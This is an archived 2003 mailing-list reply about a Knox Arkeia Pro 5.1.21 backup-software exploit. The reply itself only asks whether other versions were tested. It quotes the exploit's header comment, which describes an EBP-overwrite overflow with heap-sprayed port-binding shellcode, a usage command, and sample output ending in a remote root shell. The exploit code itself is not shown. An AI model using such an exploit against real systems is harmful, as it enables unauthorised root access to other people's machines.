[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <200309191429.16613.dlhane@sbcglobal.net>
From: dlhane at sbcglobal.net (David Hane)
Subject: Knox Arkeia 5.1.21 local/remote root exploit
Have you tested this on other versions?
DH
On Friday 19 September 2003 10:36, A. C. wrote:
> Exploit attached for Knox Arkeia Pro v5.1.21 backup
> software from http://www.arkeia.com.
>
>
>
>
> /*
> * Knox Arkiea arkiead local/remote root exploit.
> *
> * Portbind 5074 shellcode
> *
> * Tested on Redhat 8.0, Redhat 7.2, but all versions
> are presumed vulnerable.
> *
> * NULLs out least significant byte of EBP to pull EIP
> out of overflow buffer.
> * A previous request forces a large allocation of
> NOP's + shellcode in heap
> * memory. Find additional targets by searching the
> heap for NOP's after a
> * crash. safeaddr must point to any area of memory
> that is read/writable
> * and won't mess with program/shellcode flow.
> *
> * ./ark_sink host targetnum
> * [user@...t dir]$ ./ark_sink 192.168.1.2 1
> * [*] Connected to 192.168.1.2:617
> * [*] Connected to 192.168.1.2:617
> * [*] Sending nops+shellcode
> * [*] Done, sleeping
> * [*] Sending overflow
> * [*] Done
> * [*] Sleeping and connecting remote shell
> * [*] Connected to 192.168.1.2:5074
> * [*] Success, enjoy
> * id
> * uid=0(root) gid=0(root)
> groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
> *
> *
> */
>
>
>
>
> __________________________________
> Do you Yahoo!?
> Yahoo! SiteBuilder - Free, easy-to-use web site design software
> http://sitebuilder.yahoo.com
Powered by blists - more mailing lists